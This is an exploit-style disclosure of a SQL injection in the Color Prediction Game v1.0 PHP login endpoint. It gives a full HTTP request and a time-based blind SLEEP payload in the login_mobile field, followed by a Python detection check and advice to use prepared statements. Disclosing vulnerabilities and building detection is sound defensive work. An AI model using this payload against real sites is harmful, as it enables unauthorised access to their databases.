
Color Prediction Game v1.0 - SQL Injection

# Exploit Title: Color Prediction Game v1.0 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit Bayram
# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
# Tested on: Kali Linux, MacOS
# CVE: N/A
### Request ###
POST /loginnow.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395879129218961020344050490865
Content-Length: 434
Origin: http://localhost
Referer: http://localhost/login.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"

433434343433
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"

123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"

login
-----------------------------395879129218961020344050490865--
### Parameter and Payload ###
Parameter: MULTIPART login_mobile ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"

4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADA) AND 'pdlw'='PDLW
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"

123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"

login
-----------------------------395879129218961020344050490865--
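
Defender-side check for the request shown above, added here as an example (not part of the original post or the vendor's code): it parses the multipart login body and flags a login_mobile value that is not a plain number or that carries a MySQL delay function. The digits-only rule, the function names and the sample bodies are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes

BOUNDARY = "---------------------------395879129218961020344050490865"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY

# Assumed rule for illustration: a mobile number is 6-15 digits, nothing else.
FIELD_RULES = {"login_mobile": re.compile(r"\d{6,15}")}
# Delay primitives used by time-based blind probes against MySQL.
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)

def parse_fields(content_type, body):
    """Return {field name: value} for a multipart/form-data request body."""
    head = b"Content-Type: " + content_type.encode() + b"\r\n\r\n"
    msg = message_from_bytes(head + body)
    fields = {}
    for part in (msg.get_payload() if msg.is_multipart() else []):
        name = part.get_param("name", header="content-disposition")
        if name:
            raw = part.get_payload(decode=True) or b""
            fields[name] = raw.decode("utf-8", "replace").strip()
    return fields

def findings(content_type, body):
    """List (field, reason) pairs worth rejecting or alerting on."""
    out = []
    for name, value in parse_fields(content_type, body).items():
        rule = FIELD_RULES.get(name)
        if rule and not rule.fullmatch(value):
            out.append((name, "format"))
        if DELAY_RE.search(value):
            out.append((name, "delay-function"))
    return out

def sample_body(mobile):
    """Constructed sample: the three-field login form from the request above."""
    parts = [("login_mobile", mobile), ("login_password", "123456"), ("action", "login")]
    chunks = ['--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n'
              % (BOUNDARY, n, v) for n, v in parts]
    return ("".join(chunks) + "--" + BOUNDARY + "--\r\n").encode()

# The login_mobile value from the payload section above, used as test input.
PROBE = "4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADA) AND 'pdlw'='PDLW"

if __name__ == "__main__":
    print(findings(CONTENT_TYPE, sample_body("433434343433")))
    print(findings(CONTENT_TYPE, sample_body(PROBE)))
```

Input checks like this help with detection and early rejection; the underlying fix for SQL injection is to bind login_mobile as a parameter in a prepared statement instead of concatenating it into the query.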
 